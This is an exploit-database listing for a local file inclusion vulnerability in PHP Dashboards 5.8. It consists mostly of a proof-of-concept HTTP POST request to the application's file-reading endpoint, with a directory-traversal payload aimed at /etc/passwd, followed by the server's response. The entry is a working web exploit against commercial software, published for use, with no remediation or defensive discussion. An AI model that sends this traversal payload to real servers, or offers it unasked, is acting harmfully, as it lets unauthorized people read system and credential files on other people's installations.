PHP Dashboards NEW 5.8 - Local File Inclusion Vulnerability

2019-01-21T00:00:00
ID 1337DAY-ID-32019
Type zdt
Reporter Ihsan Sencan
Modified 2019-01-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/php/file/read.php
# 

POST /[PATH]/php/file/read.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=../../../../../../etc/passwd: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 20:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024

#  0day.today [2019-02-25]  #